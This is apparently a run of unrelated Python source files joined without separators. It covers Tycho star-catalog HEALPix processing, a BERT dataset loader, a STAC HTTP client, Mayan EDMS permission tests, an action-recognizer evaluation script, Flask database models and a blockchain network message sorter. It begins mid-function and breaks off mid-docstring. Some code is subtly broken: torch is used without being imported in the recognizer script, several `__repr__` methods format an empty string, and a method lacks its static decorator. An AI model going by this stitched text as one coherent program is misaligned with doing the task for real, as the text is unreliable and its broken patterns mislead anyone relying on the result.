msg = "\nCopied from: {}\non: {}\nthe specific file being: {}\n".format( cosmodir, copydate, cosmofile) with open(rfile) as f: readme = f.read() with open(routfile, 'w') as f: f.write(readme+msg) log.info('Wrote Tycho FITS file...t={:.1f}s'.format(time()-start)) return def tycho_fits_to_healpix(): """Convert files in $TYCHO_DIR/fits to files in $TYCHO_DIR/healpix. Returns ------- Nothing But the archived Tycho FITS files in $TYCHO_DIR/fits are rearranged by HEALPixel in the directory $TYCHO_DIR/healpix. The HEALPixel sense is nested with nside=get_tycho_nside(), and each file in $TYCHO_DIR/healpix is called healpix-xxxxx.fits, where xxxxx corresponds to the HEALPixel number. Notes ----- - The environment variable $TYCHO_DIR must be set. """ # ADM the resolution at which the Tycho HEALPix files are stored. nside = get_tycho_nside() npix = hp.nside2npix(nside) # ADM check that the TYCHO_DIR is set. tychodir = get_tycho_dir() # ADM construct the directories for reading/writing files. fitsdir = os.path.join(tychodir, "fits") tychofn = os.path.join(fitsdir, "tycho2.kd.fits") hpxdir = os.path.join(tychodir, "healpix") # ADM make sure the output directory is empty. if os.path.exists(hpxdir): if len(os.listdir(hpxdir)) > 0: msg = "{} must be empty to make Tycho HEALPix files!".format(hpxdir) log.critical(msg) raise ValueError(msg) # ADM make the output directory, if needed. else: log.info("Making Tycho directory for storing HEALPix files") os.makedirs(hpxdir) # ADM read in the Tycho file and assing Tycho objects to HEALPixels. objs, allhdr = fitsio.read(tychofn, header=True, upper=True) pix = radec2pix(nside, objs["RA"], objs["DEC"]) # ADM loop through the pixels and write out the files. for pixnum in range(npix): # ADM construct the name of the output file. outfilename = io.hpx_filename(pixnum) outfile = os.path.join(hpxdir, outfilename) # ADM update the header with new information. hdr = dict(allhdr).copy() hdr["HPXNSIDE"] = nside hdr["HPXNEST"] = True hdr["HPXDATE"] = datetime.utcnow().isoformat(timespec='seconds') # ADM determine which objects are in this pixel and write out. done = objs[pix == pixnum] fitsio.write(outfile, done, extname="TYCHOHPX", header=hdr) log.info('Wrote Tycho HEALPix files...t={:.1f}s'.format(time()-start)) return def make_tycho_files(): """Make the HEALPix-split Tycho files in one fell swoop. Returns ------- Nothing But produces: - A FITS file with appropriate header and columns from `tychodatamodel`, and a README in $TYCHO_DIR/fits. - FITS files reorganized by HEALPixel in $TYCHO_DIR/healpix. The HEALPixel sense is nested with nside=get_tycho_nside(), and each file in $TYCHO_DIR/healpix is called healpix-xxxxx.fits, where xxxxx corresponds to the HEALPixel number. Notes ----- - The environment variable $TYCHO_DIR must be set. """ t0 = time() log.info('Begin making Tycho files...t={:.1f}s'.format(time()-t0)) # ADM check that the TYCHO_DIR is set. tychodir = get_tycho_dir() # ADM a quick check that the fits and healpix directories are empty # ADM before embarking on the slower parts of the code. fitsdir = os.path.join(tychodir, 'fits') hpxdir = os.path.join(tychodir, 'healpix') for direc in [fitsdir, hpxdir]: if os.path.exists(direc): if len(os.listdir(direc)) > 0: msg = "{} should be empty to make Tycho files!".format(direc) log.critical(msg) raise ValueError(msg) grab_tycho() log.info('Copied Tycho FITS file from cosmo...t={:.1f}s'.format(time()-t0)) tycho_fits_to_healpix() log.info('Rearranged FITS files by HEALPixel...t={:.1f}s'.format(time()-t0)) return def find_tycho_files(objs, neighbors=True, radec=False): """Find full paths to Tycho healpix files for objects by RA/Dec. Parameters ---------- objs : :class:`~numpy.ndarray` Array of objects. Must contain the columns "RA" and "DEC". neighbors : :class:`bool`, optional, defaults to ``True`` Also return all pixels that touch the files of interest to prevent edge effects (e.g. if a Tycho source is 1 arcsec away from a primary source and so in an adjacent pixel). radec : :class:`bool`, optional, defaults to ``False`` If ``True`` then the passed `objs` is an [RA, Dec] list instead of a rec array that contains "RA" and "DEC". Returns ------- :class:`list` A list of all Tycho files to read to account for objects at the passed locations. Notes ----- - The environment variable $TYCHO_DIR must be set. """ # ADM the resolution at which the Tycho HEALPix files are stored. nside = get_tycho_nside() # ADM check that the TYCHO_DIR is set and retrieve it. tychodir = get_tycho_dir() hpxdir = os.path.join(tychodir, 'healpix') return io.find_star_files(objs, hpxdir, nside, neighbors=neighbors, radec=radec) def find_tycho_files_hp(nside, pixlist, neighbors=True): """Find full paths to Tycho healpix files in a set of HEALPixels. Parameters ---------- nside : :class:`int` (NESTED) HEALPixel nside. pixlist : :class:`list` or `int` A set of HEALPixels at `nside`. neighbors : :class:`bool`, optional, defaults to ``True`` Also return files corresponding to all neighbors that touch the pixels in `pixlist` to prevent edge effects (e.g. a Tycho source is 1 arcsec outside of `pixlist` and so in an adjacent pixel). Returns ------- :class:`list` A list of all Tycho files that need to be read in to account for objects in the passed list of pixels. Notes ----- - The environment variable $TYCHO_DIR must be set. """ # ADM the resolution at which the healpix files are stored. filenside = get_tycho_nside() # ADM check that the TYCHO_DIR is set and retrieve it. tychodir = get_tycho_dir() hpxdir = os.path.join(tychodir, 'healpix') # ADM work with pixlist as an array. pixlist = np.atleast_1d(pixlist) # ADM determine the pixels that touch the passed pixlist. pixnum = nside2nside(nside, filenside, pixlist) # ADM if neighbors was sent, then retrieve all pixels that touch each # ADM pixel covered by the provided locations, to prevent edge effects... if neighbors: pixnum = add_hp_neighbors(filenside, pixnum) # ADM reformat in the healpix format used by desitarget. tychofiles = [os.path.join(hpxdir, io.hpx_filename(pn)) for pn in pixnum] return tychofiles def match_to_tycho(objs, matchrad=1., radec=False): """Match objects to Tycho healpixel files. Parameters ---------- objs : :class:`~numpy.ndarray` Must contain at least "RA" and "DEC". matchrad : :class:`float`, optional, defaults to 1 arcsec The radius at which to match in arcseconds. radec : :class:`bool`, optional, defaults to ``False`` If ``True`` then the passed `objs` is an [RA, Dec] list instead of a rec array. Returns ------- :class:`~numpy.ndarray` The matching Tycho information for each object. The returned format is as for desitarget.tychomatch.tychodatamodel with an extra column "TYCHO_SEP" which is the matching distance in ARCSECONDS. Notes ----- - For objects with NO match in Tycho, the "TYC1", "TYC2" and "TYCHO_SEP" columns are -1, and other columns are zero. - Retrieves the CLOSEST match to Tycho for each passed object. - Because this reads in HEALPixel split files, it's (far) faster for objects that are clumped rather than widely distributed. """ # ADM parse whether a structure or coordinate list was passed. if radec: ra, dec = objs else: ra, dec = objs["RA"], objs["DEC"] # ADM set up an array of Tycho information for the output. nobjs = len(ra) done = np.zeros(nobjs, dtype=tychodatamodel.dtype) # ADM objects without matches should have TYC1/2/3, TYCHO_SEP of -1. for col in "TYC1", "TYC2": done[col] = -1 tycho_sep = np.zeros(nobjs) - 1 # ADM determine which Tycho files need to be scraped. tychofiles = find_tycho_files([ra, dec], radec=True) nfiles = len(tychofiles) # ADM catch the case of no matches to Tycho. if nfiles > 0: # ADM loop through the Tycho files and find matches. for ifn, fn in enumerate(tychofiles): if ifn % 500 == 0 and ifn > 0: log.info('{}/{} files; {:.1f} total mins elapsed' .format(ifn, nfiles, (time()-start)/60.)) tycho = fitsio.read(fn) idtycho, idobjs, dist = radec_match_to( [tycho["RA"], tycho["DEC"]], [ra, dec], sep=matchrad, radec=True, return_sep=True) # ADM update matches whenever we have a CLOSER match. ii = (tycho_sep[idobjs] == -1) | (tycho_sep[idobjs] > dist) done[idobjs[ii]] = tycho[idtycho[ii]] tycho_sep[idobjs[ii]] = dist[ii] # ADM add the separation distances to the output array. dt = tychodatamodel.dtype.descr + [("TYCHO_SEP", ">f4")] output = np.zeros(nobjs, dtype=dt) for col in tychodatamodel.dtype.names: output[col] = done[col] output["TYCHO_SEP"] = tycho_sep return output import torch from torch.utils.data import Dataset, DataLoader from transformers import BertTokenizer from config import args from data_utils import LoadData from Model import BaselineBert from tqdm import trange class DataLoaderBert(Dataset): """ To predict the factuality v_t for the event referred to by a word w_t, use the contextualized embeddings in the last layer of the pre-trained BERT model as the input to a two-layer regression model. NOTE: assert w_t is the trigger, and there is only one trigger per sentence. """ def __init__(self, train_path, dev_path, test_path, dataset): super(DataLoaderBert, self).__init__() loaddata = LoadData(train_path, dev_path, test_path) a = loaddata.conllu_counter[dataset] counter = loaddata.counter_process(a) tokenizer = BertTokenizer.from_pretrained(args.bert_model) max_length = 0 for i in range(len(counter)): if len(counter[i].sentence) > max_length: max_length = len(counter[i].sentence) print("max_length", max_length) max_length += 2 # [CLS], [SEP] for i in trange(len(counter)): assert len(counter[i].trigger) == 1, "not one trigger per sentence" counter[i].sentence_emb = torch.tensor(tokenizer.encode(counter[i].sentence, padding='max_length', max_length=max_length)) # [seq_len] counter[i].mask = torch.zeros(max_length) counter[i].mask[:len(counter[i].sentence)+2] = 1 counter[i].adj_matrix = counter[i].trans_data(max_length - 2) counter[i].index = i self.data = counter self.len = len(self.data) print(dataset, self.len) def __getitem__(self, index): ''' return self.data[index].sentence, self.data[index].sentence_emb, self.data[index].index, torch.tensor( self.data[index].trigger_index,dtype=torch.long), torch.tensor(self.data[index].eep) ''' return self.data[index].sentence_emb, self.data[index].mask, self.data[index].adj_matrix, \ torch.tensor(self.data[index].eep[0]), torch.tensor(self.data[index].trigger_index[0], dtype=torch.long), \ self.data[index].trigger[0] def __len__(self): return self.len if __name__ == "__main__": train_dataset = DataLoaderBert("../unified/meantime/train.conll", "../unified/meantime/dev.conll", "../unified/meantime/test.conll", 'train') train_iter = DataLoader(dataset=train_dataset, batch_size=32, shuffle=False) model = BaselineBert() for sentence_emb, mask, adj_matrix, eep, trigger_index, trigger in train_iter: print(sentence_emb.shape) print(mask.shape) print(adj_matrix.shape) print(eep.shape) print(trigger_index.shape) out = model(sentence_emb, trigger_index, mask) # accu = F.l1_loss(out, eep) # print(accu) # # This file is part of Python Client Library for STAC. # Copyright (C) 2019 INPE. # # Python Client Library for STAC is free software; you can redistribute it and/or modify it # under the terms of the MIT License; see LICENSE file for more details. # """Utility data structures and algorithms.""" from requests import get, post from json import dumps class Utils: """Utils STAC object.""" @staticmethod def _get(url, params=None): """Query the STAC service using HTTP GET verb and return the result as a JSON document. :param url: The URL to query must be a valid STAC endpoint. :type url: str :param params: (optional) Dictionary, list of tuples or bytes to send in the query string for the underlying `Requests`. :type params: dict :rtype: dict :raises ValueError: If the response body does not contain a valid json. """ return get(url, params=params) def _post(url, data=None): """Query the STAC service using HTTP POST verb and return the result as a JSON document. :param url: The URL to query must be a valid STAC endpoint. :type url: str :param data: (optional) Dictionary, list of tuples or bytes to send in the query string for the underlying `Requests`. :type params: dict :rtype: dict :raises ValueError: If the response body does not contain a valid json. """ return post(url, data=dumps(data), headers={'content-type': 'application/json'}) import torch from torch import nn class Scatter(nn.Module): def __init__(self, dim=0): self.dim = dim super().__init__() def forward(self, data: torch.Tensor, indices: torch.Tensor, updates: torch.Tensor): return torch.scatter(data, self.dim, indices, updates) from mayan.apps.documents.permissions import ( permission_document_tools, permission_document_view ) from mayan.apps.documents.tests.base import GenericDocumentViewTestCase from ..models import DuplicateBackendEntry from .mixins import ( DuplicatedDocumentTestMixin, DuplicatedDocumentToolViewTestMixin, DuplicatedDocumentViewTestMixin ) class DocumentsDuplicateListViewsTestCase( DuplicatedDocumentTestMixin, DuplicatedDocumentViewTestMixin, GenericDocumentViewTestCase ): def test_document_duplicates_list_no_permission(self): self._upload_duplicate_document() response = self._request_test_document_duplicates_list_view() self.assertEqual(response.status_code, 404) def test_document_duplicates_list_with_source_access(self): self._upload_duplicate_document() self.grant_access( obj=self.test_documents[0], permission=permission_document_view ) response = self._request_test_document_duplicates_list_view() self.assertContains( response=response, status_code=200, text=self.test_documents[0].label ) self.assertNotContains( response=response, status_code=200, text=self.test_documents[1].label ) def test_document_duplicates_list_with_target_access(self): self._upload_duplicate_document() self.grant_access( obj=self.test_documents[1], permission=permission_document_view ) response = self._request_test_document_duplicates_list_view() self.assertEqual(response.status_code, 404) def test_document_duplicates_list_with_full_access(self): self._upload_duplicate_document() self.grant_access( obj=self.test_documents[0], permission=permission_document_view ) self.grant_access( obj=self.test_documents[1], permission=permission_document_view ) response = self._request_test_document_duplicates_list_view() self.assertContains( response=response, status_code=200, text=self.test_documents[0].label ) self.assertContains( response=response, status_code=200, text=self.test_documents[1].label ) def test_document_duplicates_list_trashed_source_with_full_access(self): self._upload_duplicate_document() self.grant_access( obj=self.test_documents[0], permission=permission_document_view ) self.grant_access( obj=self.test_documents[1], permission=permission_document_view ) self.test_documents[0].delete() response = self._request_test_document_duplicates_list_view() self.assertEqual(response.status_code, 404) def test_document_duplicates_list_trashed_target_with_full_access(self): self._upload_duplicate_document() self.grant_access( obj=self.test_documents[0], permission=permission_document_view ) self.grant_access( obj=self.test_documents[1], permission=permission_document_view ) self.test_documents[1].delete() response = self._request_test_document_duplicates_list_view() self.assertContains( response=response, status_code=200, text=self.test_documents[0].label ) self.assertNotContains( response=response, status_code=200, text=self.test_documents[1].label ) class DuplicatedDocumentListViewsTestCase( DuplicatedDocumentTestMixin, DuplicatedDocumentViewTestMixin, GenericDocumentViewTestCase ): def test_duplicated_document_list_no_permission(self): self._upload_duplicate_document() response = self._request_test_duplicated_document_list_view() self.assertNotContains( response=response, status_code=200, text=self.test_documents[0].label ) def test_duplicated_document_list_with_source_access(self): self._upload_duplicate_document() self.grant_access( obj=self.test_documents[0], permission=permission_document_view ) response = self._request_test_duplicated_document_list_view() self.assertNotContains( response=response, status_code=200, text=self.test_documents[0].label ) self.assertNotContains( response=response, status_code=200, text=self.test_documents[1].label ) def test_duplicated_document_list_with_target_access(self): self._upload_duplicate_document() self.grant_access( obj=self.test_documents[1], permission=permission_document_view ) response = self._request_test_duplicated_document_list_view() self.assertNotContains( response=response, status_code=200, text=self.test_documents[0].label ) self.assertNotContains( response=response, status_code=200, text=self.test_documents[1].label ) def test_duplicated_document_list_with_full_access(self): self._upload_duplicate_document() self.grant_access( obj=self.test_documents[0], permission=permission_document_view ) self.grant_access( obj=self.test_documents[1], permission=permission_document_view ) response = self._request_test_duplicated_document_list_view() self.assertContains( response=response, status_code=200, text=self.test_documents[0].label ) self.assertContains( response=response, status_code=200, text=self.test_documents[1].label ) def test_duplicated_document_list_trashed_source_with_full_access(self): self._upload_duplicate_document() self.grant_access( obj=self.test_documents[0], permission=permission_document_view ) self.grant_access( obj=self.test_documents[1], permission=permission_document_view ) self.test_documents[0].delete() response = self._request_test_duplicated_document_list_view() self.assertNotContains( response=response, status_code=200, text=self.test_documents[0].label ) self.assertNotContains( response=response, status_code=200, text=self.test_documents[1].label ) def test_duplicated_document_list_trashed_target_with_full_access(self): self._upload_duplicate_document() self.grant_access( obj=self.test_documents[0], permission=permission_document_view ) self.grant_access( obj=self.test_documents[1], permission=permission_document_view ) self.test_documents[1].delete() response = self._request_test_duplicated_document_list_view() self.assertNotContains( response=response, status_code=200, text=self.test_documents[0].label ) self.assertNotContains( response=response, status_code=200, text=self.test_documents[1].label ) class DuplicatedDocumentToolsViewsTestCase( DuplicatedDocumentTestMixin, DuplicatedDocumentToolViewTestMixin, GenericDocumentViewTestCase ): def test_duplicated_document_scan_no_permission(self): self._upload_duplicate_document() DuplicateBackendEntry.objects.all().delete() response = self._request_duplicated_document_scan_view() self.assertEqual(response.status_code, 403) self.assertFalse( self.test_documents[1] in DuplicateBackendEntry.objects.get_duplicates_of( document=self.test_documents[0] ) ) def test_duplicated_document_scan_with_permission(self): self._upload_duplicate_document() DuplicateBackendEntry.objects.all().delete() self.grant_permission(permission=permission_document_tools) response = self._request_duplicated_document_scan_view() self.assertEqual(response.status_code, 302) self.assertTrue( self.test_documents[1] in DuplicateBackendEntry.objects.get_duplicates_of( document=self.test_documents[0] ) ) test_recognizer.py """test recognizer""" import argparse import warnings import mmcv import numpy as np from mmcv.runner import obj_from_dict from torch.nn.parallel import DataParallel, DistributedDataParallel import paddle # from mmcv.parallel import MMDataParallel, MMDistributedDataParallel from codes import datasets from codes.core import (get_dist_info, init_dist, mean_class_accuracy, multi_gpu_test, single_gpu_test, top_k_accuracy) from codes.datasets import build_dataloader from codes.models import build_recognizer from codes.utils import load_checkpoint # from codes.core import MMDataParallel, MMDistributedDataParallel warnings.filterwarnings("ignore", category=UserWarning) args = None def parse_args(): """parse_args""" parser = argparse.ArgumentParser(description='Test an action recognizer') parser.add_argument('config', help='test config file path') parser.add_argument('checkpoint', help='checkpoint file') parser.add_argument( '--launcher', choices=['none', 'pytorch', 'mpi', 'slurm'], default='none', help='job launcher') parser.add_argument( '--gpus', type=int, default=1, help='number of gpus to use ' '(only applicable to non-distributed training)') parser.add_argument( '--average-clips', choices=['score', 'prob'], default='prob', help='average type when averaging test clips') parser.add_argument('--out', help='output result file', default='default.pkl') # only for TSN3D parser.add_argument('--fcn_testing', action='store_true', help='use fcn testing for 3D convnet') parser.add_argument('--local_rank', type=int, default=0) args = parser.parse_args() return args def main(): """main""" global args args = parse_args() if args.out is not None and not args.out.endswith(('.pkl', '.pickle')): raise ValueError('The output file must be a pkl file.') cfg = mmcv.Config.fromfile(args.config) cfg.gpus = args.gpus cfg.data.test.test_mode = True # pass arg of fcn testing if args.fcn_testing: cfg.model.update({'fcn_testing': True}) cfg.model['cls_head'].update({'fcn_testing': True}) if cfg.test_cfg is None: cfg.test_cfg = dict(average_clips=args.average_clips) else: cfg.test_cfg.average_clips = args.average_clips # for regular testing # pipeline_type = [op['type'] for op in cfg.test_pipeline] # if 'ThreeCrop' in pipeline_type: # cfg.model.cls_head.spatial_size = 8 dataset = obj_from_dict(cfg.data.test, datasets, dict(test_mode=True)) if args.launcher == 'none': distributed = False else: distributed = True init_dist(args.launcher, **cfg.dist_params) model = build_recognizer(cfg.model, train_cfg=None, test_cfg=cfg.test_cfg) load_checkpoint(model, args.checkpoint, map_location='cpu') data_loader = build_dataloader( dataset, num_gpus=1 if distributed else cfg.gpus, videos_per_gpu=1, workers_per_gpu=1, dist=distributed, shuffle=False) if distributed: # model = MMDistributedDataParallel(model.cuda()) model = DataParallel(model.cuda(), device_ids=[ torch.cuda.current_device()]) outputs = multi_gpu_test(model, data_loader) rank, _ = get_dist_info() else: # model = MMDataParallel(model, device_ids=range(cfg.gpus)).cuda() model = DataParallel(model, device_ids=range(cfg.gpus)).cuda() outputs = single_gpu_test(model, data_loader) rank = 0 if args.out and rank == 0: # print('\nwriting results to {}'.format(args.out)) # for videos_per_gpu > 1, vstack list of array results = np.vstack(outputs) # list(1 x n_class) -> n_video x n_class # outputs = np.vstack(outputs) [:, np.newaxis, :] mmcv.dump(results, args.out) gt_labels = [] for i in range(len(dataset)): ann = dataset.video_infos[i] gt_labels.append(ann['label']) # if args.use_softmax: # print("Averaging score over {} clips with softmax".format( # outputs[0].shape[0])) # results = [softmax(res, dim=1).mean(axis=0) for res in outputs] # else: # print("Averaging score over {} clips without softmax (ie, raw)". # format(outputs[0].shape[0])) # results = [res.mean(axis=0) for res in outputs] # results = [res.squeeze() for res in outputs] top1, top5 = top_k_accuracy(results, gt_labels, k=(1, 5)) mean_acc = mean_class_accuracy(results, gt_labels) print("Mean Class Accuracy = {:.02f}".format(mean_acc * 100)) print("Top-1 Accuracy = {:.02f}".format(top1 * 100)) print("Top-5 Accuracy = {:.02f}".format(top5 * 100)) if __name__ == '__main__': main() """ Contains Databse model classes """ import uuid as uid from werkzeug.security import generate_password_hash, check_password_hash from flask import current_app from app import db from app.errors.custom.database import DBCreationError def rollback_and_log(error): """ Rollback the database and loggs the error. Can be used when overriding http-status 500. """ current_app.logger.error(error) db.session.rollback() def format_dict(dic): """ SqlAlchemy (on Linux) can't handle string arguments on type int. """ if not dic: return {} formated_dic = {} for k, v in dic.items(): formated_dic[k] = int(v) if v.isdigit() else v return formated_dic def get_uuid4(): """ Returns a unique if for feedback view """ return str(uid.uuid4()) class Submission(db.Model): """ Represents an submission """ id = db.Column(db.Integer, primary_key=True) uuid = db.Column(db.String(45), default=get_uuid4) user_id = db.Column(db.Integer, nullable=False, index=True) user_acronym = db.Column(db.String(6), nullable=False) assignment_name = db.Column(db.String(9), nullable=False) assignment_id = db.Column(db.Integer, nullable=False) course_id = db.Column(db.Integer, db.ForeignKey('course.id'), nullable=False) course = db.relationship( 'Course', primaryjoin="Course.id == Submission.course_id", backref=db.backref('courses', uselist=False)) attempt_nr = db.Column(db.Integer, nullable=False) grade = db.Column(db.String(2), default=None) feedback = db.Column(db.Text, default=None) workflow_state = db.Column(db.String(15), default='new') # new/tested/graded/ zip_file_path = db.Column(db.String(255), default=None) def __repr__(self): return ''.format( self.user_acronym, self.assignment_name, self.course.name) class Course(db.Model): """ Represents a course """ id = db.Column(db.Integer, primary_key=True, autoincrement=False, nullable=False) name = db.Column(db.String(25), nullable=False) active = db.Column(db.Integer, default=1) @property def serialize(self): """ Returns the course as an object """ return { 'id': self.id, 'name': self.name, 'active': self.active, } @classmethod def create(cls, **kwargs): """ Creates a course and adds it to the database. """ if cls.query.filter_by(id=kwargs.get('id')).first() is not None: raise DBCreationError(f'ID {kwargs.get("id")} already exists.') course = cls(**kwargs) db.session.add(course) db.session.commit() return course def update(self, data): """ Updates a course and commits changes to the database. """ self.active = data.get('active') or self.active self.name = data.get('name') or self.name db.session.commit() return self def delete(self): """ Deletes a course and commits changes to the database. """ db.session.delete(self) db.session.commit() return self def __repr__(self): return ''.format(self.id, self.name, self.active == 1) class User(db.Model): """ Represents a system user """ id = db.Column(db.Integer, primary_key=True, autoincrement=True) username = db.Column(db.String(25), unique=True) password_hash = db.Column(db.String(128)) @property def password(self): """ Getter for password """ raise AttributeError('password is not readable') @password.setter def password(self, password): """ Setter for password """ self.password_hash = generate_password_hash(password) def compare_password(self, password): """ Compares given password to the hashed password """ return check_password_hash(self.password_hash, password) def __repr__(self): return ''.format(self.username) snwokenk/Orses_Core """ sorts the messages received from connected protocols' dataReceived determines if message should go to blockchain propagator or Network propagator. Messages for Blockchain Propagator are messages sending new blocks, or wallet_hash states Messges for Network Propagator are transaction messages and assignment statement messages (if proxy of bk_connected wallet being used) """ from Orses_Dummy_Network_Core.DummyVeriNodeConnector import DummyVeriNodeConnector from Orses_Validator_Core.ConnectedNodeValidator import ConnectedNodeValidator import json, copy class NetworkMessageSorter: def __init__(self, q_object_from_protocol, q_for_bk_propagate, q_for_propagate, n_propagator_inst, b_propagator_inst, node=None, admin=None): self.node = node self.admin = admin if admin is not None else self.node.admin self.network_prop_inst = n_propagator_inst self.blockchain_prop_inst = b_propagator_inst self.q_for_propagate = q_for_propagate self.q_for_bk_propagate = q_for_bk_propagate self.q_object_from_protocol = q_object_from_protocol self.convo_dict = dict() # a little different from others self.non_validated_connected_protocols_dict = dict() self.validated_conn_protocols_dict = dict() def add_protocol(self, protocol): # todo: rather than connecting to protocols dict, # todo: add to a preliminary dict until validated, then add to protocols dict # adds connected protocol, key as protocol_id, value: # list [protocol object, number of convo(goes to 20000 and resets)] self.non_validated_connected_protocols_dict.update({protocol.proto_id: [protocol, 0]}) self.convo_dict[protocol.proto_id] = dict() # # add to blockchain propagator connected dict # self.blockchain_prop_inst.connected_protocols_dict.update({protocol.proto_id: [protocol, 0]}) # self.blockchain_prop_inst.convo_dict[protocol.proto_id] = dict() # # add to network propagaor # self.network_prop_inst.connected_protocols_dict.update({protocol.proto_id: [protocol, 0]}) # self.network_prop_inst.convo_dict[protocol.proto_id] = dict() if isinstance(protocol, DummyVeriNodeConnector): # must send a validator message to complete connection on both ends self.network_prop_inst.reactor_instance.callInThread( self.create_sender_message, protocol=protocol, admin_inst=self.admin ) print(f"in NetworkMessageSorter.py Listener Protocol Created When Connected {protocol}") def add_protocol_to_all(self, protocol): """ when node validated add it to :param protocol: :return: """ # add to blockchain propagator connected dict self.blockchain_prop_inst.add_protocol(protocol=protocol) # add to network propagaor self.network_prop_inst.add_protocol(protocol=protocol) def run_sorter(self): """ :return: """ #todo: add message receiver for Node Validator while True: msg = self.q_object_from_protocol.get() # msg = [protocol id, data], data = [type(b or n), convo id, etc] try: msg[1] = json.loads(msg[1].decode()) # decode data bytes to string, then json decode except ValueError: print("in NetworkMessageSorter, json message error") continue except AttributeError as e: # not able to decode() probably a string if isinstance(msg, str) and msg in {"quit", "exit", "force exit"}: break else: print(f"\n-----\nError in {__file__}\nMessage causing Error: {msg}\n" f"Exception raised: {e}") continue if msg[0] in self.non_validated_connected_protocols_dict: # if in it, then peer node not yet validated protocol_id = msg[0] msg_data = msg[1] # [type(b or n), convo id, etc] local_convo_id = msg_data[1][0] if local_convo_id is not None and local_convo_id in self.convo_dict[protocol_id]: self.network_prop_inst.reactor_instance.callInThread( self.convo_dict[protocol_id][local_convo_id].listen, msg=msg_data ) elif local_convo_id is None: self.network_prop_inst.reactor_instance.callInThread( self.create_receiver_message, msg=msg_data, protocol=self.non_validated_connected_protocols_dict[protocol_id][0], admin_inst=self.admin, ) else: print(f"in NetworkMessageSorter, Node Not Validated and No Options Available") pass elif msg[0] in self.validated_conn_protocols_dict: try: # check what type of message, if 'n' then networkpropagator, if 'b' then blockchainpropagator try: print(f"in message sorter, admin:{self.node.admin.admin_name if self.node else None}, msg: {msg}, " f"") except AttributeError: pass if msg[1][0] == 'n': self.q_for_propagate.put(msg) # goes to NetworkPropagator.py, run_propagator_convo_manager elif msg[1][0] == 'b': self.q_for_bk_propagate.put(msg) # goes to BlockchainPropagator.py, run_propagator_convo_manager else: print("in NetworkMessageSorter.py, msg could not be sent to any process", msg) except IndexError as e: print(f"\n-----\nError in {__file__}\nMessage causing Error: {msg}\n" f"Exception raised: {e}") continue else: print(f"in NetworkMessageSorter.py, protocol id not in validated Or Non Validated") print("in NetworkMessageSorter.py Sorter Ended") def create_sender_message(self, protocol, admin_inst): if protocol.proto_id in self.convo_dict and self.convo_dict[protocol.proto_id]: # only one convo should be had which is validatorMessage return else: convo_id = -1 host_addr = protocol.transport.getHost() peer_addr = protocol.transport.getPeer() knw_addr = copy.deepcopy(admin_inst.known_addresses) try: knw_addr.pop(host_addr.host) except KeyError: pass try: knw_addr.pop(peer_addr.host) except KeyError: pass sender = NodeValidatorSender( protocol=protocol, convo_id=convo_id, propagator_inst=self.network_prop_inst, msg_sorter_inst=self, admin_inst=admin_inst, message_list=[ {"1": ConnectedNodeValidator.get_hash_of_important_files(admin_inst), "2": [host_addr.host, host_addr.port], "3": len(knw_addr) }, list(knw_addr) ] ) self.convo_dict[protocol.proto_id] = {convo_id: sender} sender.speak() def create_receiver_message(self, msg, protocol, admin_inst): if protocol.proto_id in self.convo_dict and self.convo_dict[protocol.proto_id]: # only one convo should be had which is validatorMessage return else: convo_id = msg[1] convo_id[0] = -1 host_addr = protocol.transport.getHost() peer_addr = protocol.transport.getPeer() knw_addr = copy.deepcopy(admin_inst.known_addresses) try: knw_addr.pop(host_addr.host) except KeyError: pass try: knw_addr.pop(peer_addr.host) except KeyError: pass receiver = NodeValidatorReceiver( protocol=protocol, convo_id=convo_id, propagatorInst=self.network_prop_inst, msg_sorter_inst=self, admin_instance=admin_inst, conn_node_validator=ConnectedNodeValidator, known_addr=knw_addr ) self.convo_dict[protocol.proto_id] = {convo_id[0]: receiver} receiver.listen(msg=msg) # helper functions class NodeValidatorSender: def __init__(self, protocol, convo_id, message_list, propagator_inst, msg_sorter_inst: NetworkMessageSorter, admin_inst): # {"1": software_hash_list, "2": ip address, "3": number of known address} self.msg_sorter_inst = msg_sorter_inst self.main_msg = message_list[0] self.addr_list = message_list[1] self.not_compatible_msg = "ntc" self.admin_inst = admin_inst self.propagator_inst = propagator_inst self.last_msg = 'end' self.verified_msg = 'ver' self.rejected_msg = 'rej' self.send_tx_msg = 'snd' self.need_pubkey = 'wpk' self.prop_type = 'n' self.end_convo = False self.end_convo_reason = None self.protocol = protocol self.local_convo_id = convo_id self.other_convo_id = None # in listen() get other convo_id self.convo_id = [self.other_convo_id, self.local_convo_id] self.sent_first_msg = False def speak(self, rsp=None): if self.end_convo is False: if self.sent_first_msg is False and rsp is None: self.sent_first_msg = True self.speaker(msg=f'e{self.admin_inst.admin_name}') elif rsp is not None: self.speaker(msg=rsp) def listen(self, msg): print(f"in Networkmessagesorter.py, listen, networkmessagesender msg\n" f"{msg}") if self.end_convo is False: if isinstance(msg[-1], str) and msg[-1] in {self.verified_msg, self.rejected_msg, self.last_msg}: self.end_convo = True self.end_convo_reason = msg[-1] try: del self.msg_sorter_inst.non_validated_connected_protocols_dict[self.protocol.proto_id] if msg[-1] == self.last_msg: self.msg_sorter_inst.validated_conn_protocols_dict[self.protocol.proto_id] = self.protocol self.msg_sorter_inst.add_protocol_to_all(protocol=self.protocol) except KeyError: pass return if self.other_convo_id is None: self.other_convo_id = msg[1][1] # msg = ['n', [your convo id, other convo id], main_msg] self.convo_id = [self.other_convo_id, self.local_convo_id] if msg[-1] == self.send_tx_msg: # msg[-1] == "snd" self.speak(self.main_msg) elif msg == self.not_compatible_msg: # todo: find a way to note nodes not running compatible software for now end convo self.end_convo = True self.end_convo_reason = msg[-1] try: del self.msg_sorter_inst.non_validated_connected_protocols_dict[self.protocol.proto_id] except KeyError: pass elif isinstance(msg[-1], dict): # peer node running compatible software, dict is to decide if to snd addr msg_dict = msg[-1] if isinstance(msg_dict["2"], list): # addresses of peer node self.admin_inst.fl.update_addresses(address_list=msg_dict["2"]) if msg_dict["1"] is True: # other node wants tocal address list self.speak(self.addr_list) else: try: del self.msg_sorter_inst.non_validated_connected_protocols_dict[self.protocol.proto_id] self.msg_sorter_inst.validated_conn_protocols_dict[self.protocol.proto_id] = self.protocol self.msg_sorter_inst.add_protocol_to_all(protocol=self.protocol) except KeyError: pass def speaker(self, msg): self.propagator_inst.reactor_instance.callFromThread( self.protocol.transport.write, json.dumps([self.prop_type, self.convo_id, msg]).encode() ) class NodeValidatorReceiver: def __init__(self, protocol, convo_id, propagatorInst, msg_sorter_inst: NetworkMessageSorter, admin_instance, conn_node_validator, known_addr): """ FIRST message should be a string with message[1:] == admin ID, this is then checked to verify that admin not blacklisted. A "snd" message ie self.send_tx_msg is sent. SECOND message should then be a dictionary with three keys "1","2", "3". key 